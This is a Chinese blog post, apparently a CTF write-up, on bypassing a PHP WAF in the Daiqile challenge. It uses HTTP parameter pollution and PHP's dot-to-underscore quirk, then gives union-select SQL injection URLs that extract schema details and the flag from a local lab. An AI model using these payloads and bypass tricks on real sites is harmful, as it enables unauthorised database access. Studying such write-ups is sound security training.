贷齐乐hpp+php特性注入

已于 2024-08-11 16:06:18 修改
阅读量792 收藏 6
点赞数 18
文章标签: php sql注入
于 2024-08-11 16:04:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_60286636/article/details/141105888
版权

文章目录

运行过程

  foreach ($_REQUEST as $key => $value) {
      $_REQUEST[$key] = dowith_sql($value);
  }
  $request_uri = explode("?", $_SERVER['REQUEST_URI']);
  if (isset($request_uri[1])) {
      $rewrite_url = explode("&", $request_uri[1]);
      foreach ($rewrite_url as $key => $value) {
          $_value = explode("=", $value);
          if (isset($_value[1])) {
              $_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));
          }
      }
  }

分析可知,先进行两层waf拦截(详见下面),首先先对传入的参数使用dowith拦截,再使用dhtmlspecialchars拦截。再查询有没有submit,如果有则将id带入数据库进行查询并且返回值,如果没有submit,则直接退出。

waf

第一层waf拦截

  function dowith_sql($str) {
      $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
      if ($check) {
          echo "非法字符!";
          exit();
      }
      return $str;
  }

这个正则拦截/select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile,当发现用户输入的参数包含这些时,会直接退出程序。

第二层waf拦截

  function dhtmlspecialchars($string) {
    if (is_array($string)) {
        foreach ($string as $key => $val) {
            $string[$key] = dhtmlspecialchars($val);
        }
    }
    else {
        $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&amp;', '&quot;', '&lt;', '&gt;', '(', ')'), $string);
        if (strpos($string, '&amp;#') !== false) {
            $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
        }
    }
    return $string;
}

这层waf是先将数据分为两个,一个key,一个value,并进行检测是不是含有非法字符。

数据库查询语句

  if (isset($_REQUEST['submit'])) {
    $user_id = $_REQUEST['i_d'];
    $sql = "select * from ctf.users where id=$user_id";
    $result=mysqli_query($conn,$sql);
    while($row = @mysqli_fetch_array($result))
    {
        echo "<tr>";
        echo "<td>" . $row['name'] . "</td>";
        echo "</tr>";
    }
}

注入思路

我们得思考下如果我们有一种方法让第一层WAF检测不到恶意字符,再通过第二层WAF的覆盖,从而将恶意字符传入到REQUEST中,其实也就可以绕过WAF,完成我们的注入了。
找好了思路,那么我们就得想办法找到这个方法,这个想法之前我们说了要让第一道WAF找不到恶意字符,那么我们就得再REQUET中不得有恶意字符。其二便是$_SERVER可以有恶意字符,但是必须过我们的第二道WAF,然后再REQUEST接收。
既然上面我们从绕过WAF变为了如何让第一道WAF检测不到恶意字符,那么我们又得想一个办法。
在php中,如果传入多个名字相同的参数,那么它会取最后一个参数,那么这样,就可以绕过第一道WAF。所以传入i_d=1&i_d=2,其最终会接收到的是i_d=2。那我们便想把恶意语句放在第一个i_d。
绕过了第一道WAF,那么就该想如何绕过第二道WAF,上面绕过第一道WAF时,也给了思路,那就是将恶意语句放在第一个i_d,那就得思考,怎么在第二道WAF时让其接受第一个i_d。
php中有个小特性,那就是传入的.将会变为_,例如我们传入i.d会被转换为i_d,那么我们就要想想能不能利用这个思路来绕过。
$_SERVER[‘REQUEST_URI’]在接受时i_d和i.d是不一样的,所以,我们便可以使用这个特性来绕过。

注入

按照上面的接替思路,我们构建payload进行测试。

http://127.0.0.1/daiqile/index.php?submit=1&i_d=1&i.d=2
http://127.0.0.1/daiqile/index.php?submit=1&i_d=2&i.d=1

使用上面进行检测,当i_d=1&i.d=2时,不会回显数据,而i_d=2&i.d=1会回显数据(因为我的数据库id=2才有数据,id=1没有数据),发现事实和我们想象的一样既绕过了第一道WAF,又将i_d传入数据库。
那么接下来就可以进入正是注入。
使用/**/代替空格
查询列数并查看回显位置

?submit=1&i_d=-2/**/union/**/select/**/1,2,3,4&i.d=1

查询数据库名(改变limit查询的行数)

?submit=1&i_d=-2/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/0,1&i.d=1

最终使用下面语句查到为ctf

?submit=1&i_d=-2/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables/**/limit/**/0,1&i.d=1

在这里插入图片描述
查表名(因为使用addslashes对单引号进行过滤,所以我们使用十六进制绕过;源码中也对=进行了过滤,我们只能使用like进行绕过)

?submit=1&i_d=-2/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466&i.d=1

在这里插入图片描述
查询列名

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/0,1&i.d=1

在这里插入图片描述

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/1,1&i.d=1

在这里插入图片描述

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/2,1&i.d=1

在这里插入图片描述

?submit=1&i_d=-2/**/union/**/select/**/1,column_name,3,4/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/0x637466/**/and/**/table_name/**/like/**/0x7573657273/**/limit/**/3,1&i.d=1

在这里插入图片描述
拿下flag

?submit=1&i_d=-2/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1

在这里插入图片描述

paddleocr:使用自己的数据微调文字识别模型
静谧、淡雅
01-12 3752
PaddleOCR地址:https://github.com/PaddlePaddle/PaddleOCR 注意: 1 OCR半自动数据标注工具:PPOCRLabel 使用python3和pyqt5编写,支持矩形框标注和四点标注模式,导出格式可直接用于PPOCR检测和识别模型的训练。 用于构建训练、验证、测试的数据集。 PPOCRLabel说明和数据集划分方法见如下地址: https://gitee.com/paddlepaddle/PaddleOCR/blob/release/2.4/PPOCRLabel
PaddleOCR:基于PaddlePaddle的出色多语言OCR工具包(实用的超轻型OCR系统,提供数据注释和综合工具,支持在服务器,移动,嵌入式和IoT设备之间进行培训和部署)
02-07
English | 介绍 PaddleOCR旨在创建多语言,出色,领先和实用的OCR工具,以帮助用户训练更好的模型并将其应用于实践。 注意 PaddleOCR支持动态图和静态图编程范例 动态图:dygraph分支(默认),受桨2.0.0支持() 静态图:开发分支 最近更新 2021.1.21更新了超过25种以上的多语言识别模型的,包括:英语,中文,德语,法语,日语,西班牙语,葡萄牙语,俄罗斯,阿拉伯语等。 更多语言的模型将继续更新 。 2020.12.15更新了数据合成工具,即 ,易于合成与目标场景图像相似的大量图像。 2020.11.25更新新的数据注释工具 ,这有助于提高标记效率。 此外,标记结果可直接用于PP-OCR系统的培训。 2020.9.22更新PP-OCR技术文章 产品特点 PPOCR系列高质量的预训练模型,可媲美商业效果 超轻量ppocr_mobile系列模型:检测
PaddleOCR-PP-OCRv4推理详解及部署实现(中)
周同学的博客
07-23 3345
PaddleOCR-PP-OCRv4推理详解及部署实现(中)
OCR第三个方案:PP-OCRv4的初步探索
懒人的技术笔记
03-31 1924
PP-OCRv3(2022):采用SVTR识别架构,中文识别准确率突破80% PP-OCRv4(2023):融合Transformer与CNN的混合架构,实现多维度性能突破
从零开始使用最新版PaddlePaddleOCR系列】——第二部分:自建数据集 + 模型微调训练
qq_58718853的博客
10-15 2593
本文记录如何构建符合paddle规范的数据集,然后使用模型配置文件的命令行形式微调训练自建数据集上的新模型参数
PPOCR-V4训练-推理全流程
chengzijiaotang的博客
01-17 706
文本方向分模型:ch_ppocr_mobile_slim_v2.0_cls。检测模型:ch_PP-OCRv4_det。识别模型:ch_PP-OCRv4_rec。
PaddleOCR-PP-OCRv4推理详解及部署实现(上)
热门推荐
周同学的博客
07-21 1万+
PaddleOCR-PP-OCRv4推理详解及部署实现(上)
Paddle OCR v4 微调训练文字识别SVTRNet模型实践
every place is the center of the universe
04-25 5377
paddle ocr v4 微调训练文字识别模型实践
手写文字识别:PaddleOCR基于PPOCRv4的垂场景模型微调
简简单单的学习笔记,致力于帮助更多前进路上的朋友~
03-04 1万+
PaddleOCR提供的PP-OCR系列模型在通用场景中性能优异,能够解决绝大多数情况下的检测与识别问题。在垂场景中,如果希望获取更优的模型效果,可以通过模型微调的方法,进一步提升PP-OCR系列检测与识别模型的精度。
最好用的图文识别OCR -- PaddleOCR(4) 模型微调
路漫漫其修远兮 吾将上下而求索
01-13 3103
PaddleOCR模型微调模型测试、模型转换、推理模型应用
PaddleOCR》—— OCR
will be blogging
03-11 2687
PaddleOCR 是百度基于飞桨(PaddlePaddle)框架开源的全场景文字识别工具,支持多语言、多场景、高精度的 OCR 能力,覆盖文本检测、识别、方向分等全流程,广泛应用于文档扫描、车牌识别、票据处理、工业质检等场景
PaddleOCR检测模型微调实战:从数据准备到生产
fudaihb的博客
04-14 815
将文本检测准确率平均提升25-40%处理速度保持原有水平的90%以上支持特殊场景下的复杂文本检测需求PaddleOCR团队公布的数据显示,经过合理微调的检测模型垂直领域应用中,相比通用模型可减少70%的标注成本。正如百度首席技术官王海峰所言:“飞桨与PaddleOCR的组合,正在重新定义产业智能化的边界。完整案例代码及配置文件已开源至GitHub仓库,访问PaddleOCR官网获取最新技术资料。
PaddleOCR:基于PaddlePaddle的超赞多语言OCR工具包-开源
04-29
PaddleOCR提供了卓越,多语言和实用的光学字符识别(OCR)工具,可以帮助用户训练更好的模型并将其应用于实践。 受PaddlePaddle的启发,PaddleOCR是一款超轻量级的OCR系统,具有多语言识别,数字识别,垂直文本识别以及长文本识别。 它具有PPOCR系列的高质量预训练模型,其中包括:超轻型ppocr_mobile系列模型,通用ppocr_server系列模型和超轻型压缩ppocr_mobile_slim系列模型PaddleOCR易于安装,并且易于在Windows,Linux,MacOS和其他系统上使用。
二代paddle-ocr光学文字识别模型部署源码+项目说明.zip
03-16
二代paddle-ocr光学文字识别模型部署源码+项目说明.zip二代paddle-ocr光学文字识别模型部署源码+项目说明.zip二代paddle-ocr光学文字识别模型部署源码+项目说明.zip二代paddle-ocr光学文字识别模型部署源码+项目说明...
基于C/C++树莓派4B与Paddle-Lite实现的场景+源码+项目文档+使用教程(毕业设计&课程设计&项目开发)
04-20
基于C/C++树莓派4B与Paddle-Lite实现的场景+源码+项目文档+使用教程,适合毕业设计、课程设计、项目开发。项目源码已经过严格测试,可以放心参考并在此基础上延申使用,详情见md文档 基于C/C++树莓派4B与Paddle...
Umi-OCR-Paddle-v2.1.4.7z离线图片识别工具
11-21
此外,从软件的命名规则来看,“Umi-OCR-Paddle-v2.1.4”可能暗示着这款工具的开发商或维护者可能是Umi公司,或者是由该公司根据PaddlePaddle框架定制开发的。这个软件的命名也可能表明了它是一个持续更新的产品,...
二代paddle-ocr光学文字识别模型部署完整源码+说明.zip
03-27
2、适用人群:主要针对计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、数学、电子信息等)的同学或企业员工下载使用,具有较高的学习借鉴价值。 3、不仅适合小白学习实战练习,也...
paddle-ocr-2-6.rar
04-18
参考博客:https://blog.youkuaiyun.com/Helloorld_1/article/details/130217468
PPOCRv4推理模型转换为nb模型
最新发布
2201_75550012的博客
04-30 837
3.File->New->Import Project 打开Paddle-Lite-Demo\object_detection\android\app\cxx\ssd_mobilenetv1_detection_demo 点击运行。mkdir -p /你的目录/Paddle-Lite/ch_PP-OCRv4_det_infer/nbmodel/--model_file=/你的路径/nbmodel/inference.pdmodel \。安装paddlepaddle,5.接下来就可以转换了。
ppocrv4 error happened with msg: Traceback (most recent call last):
01-25
### 解决 PP-OCRv4 出现的错误 当遇到 `WARNING: The pretrained params backbone.blocks2.0.dw_conv.lab.scale not in model` 这样的警告时,这通常意味着预训练模型中的某些参数未能匹配到当前配置下的模型结构中[^2]。 对于此问题的一个有效解决方案是采用特定配置文件来适配预训练权重。具体操作方法如下: 通过指定配置文件 `ch_PP-OCRv4_det_student.yml` 并利用已有的最佳精度预训练模型 (`best_accuracy`) 来启动训练过程可以绕过上述不兼容的问题。执行命令如下所示: ```bash python3 tools/train.py -c configs/det/ch_PP-OCRv4/ch_PP-OCRv4_det_student.yml ``` 该方案不仅解决了参数缺失带来的警告,还能够继续基于高质量的预训练成果进行微调,从而提升最终检测效果。 关于蒸馏的概念,在机器学习领域内指的是将大型复杂网络(teacher 模型)的知识迁移到小型简单网络(student 模型)。这里 student 和 teacher 的关系是指两个不同规模或架构的神经网络之间的指导与被指导的关系;其中 teacher 已经经过充分训练并具有良好的性能,而 student 则试图模仿前者的行为模式以达到相似的效果但保持更高效的计算特性。 至于提到的 `Traceback` 错误信息部分,由于未提供具体的跟踪堆栈详情,难以给出针对性建议。不过一般而言,这报错往往涉及代码逻辑错误或是环境配置不当等问题。为了更好地帮助定位和解决问题,推荐记录完整的异常日志,并仔细检查最近修改过的代码片段以及确认依赖库版本的一致性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

麦农111

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值